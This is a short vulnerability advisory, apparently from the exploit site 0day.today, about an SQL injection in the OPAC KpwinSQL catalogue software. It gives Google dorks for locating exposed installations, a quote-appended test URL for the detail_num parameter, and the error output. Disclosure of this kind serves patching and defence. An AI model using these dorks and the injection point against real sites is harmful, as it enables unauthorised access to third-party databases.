OPAC KpwinSQL - SQL Injection

🗓️ 27 Jun 2016 00:00:00Reported by bRpsdType

zdt🔗 0day.today👁 24 Views

OPAC KpwinSQL - SQL Injection, Firebird 1.5.3, Win98SE-2003, Vist

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 
Product -> OPAC KpwinSQL - SQL Injection
Date -> 6/24/2016
Author -> bRpsd
Skype: vegnox
Vendor HomePage -> http://www.kpsys.cz/
Product Download -> http://www.kpsys.cz/kpwinsql/demo.html
Product Version -> / All
SQL Version -> Firebird 1.5.3 
OS -> Win98SE, Me, NT, 2000, XP, 2003, Vista
 
 
Dork -> intitle:"WWW OPAC KpwinSQL"
Dork2 -> inurl:zaznam.php?detail_num=
Dork3 -> inurl:opacsql2_0
 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 
 
File: zanzam.php
Parameter: detail_num
 
 
 
Test > http://localhost:8888/zaznam.php?detail_num=1'
 
 
Response:
 
24-06-2016 08:52:21: localhost: CHYBA: 2 WARNING: ibase_query(): Dynamic SQL Error SQL error code = -104 Unexpected end of command - line 1, column 40 :In: "C:\wwwopac\functions.php" (Line: 5462) : URL:"/zaznam.php?detail_num=1%27"Pri zpracovani pozadavku doslo k chybe, omlouvame se ...

#  0day.today [2018-04-13]  #

27 Jun 2016 00:00Current

7.1High risk

Vulners AI Score7.1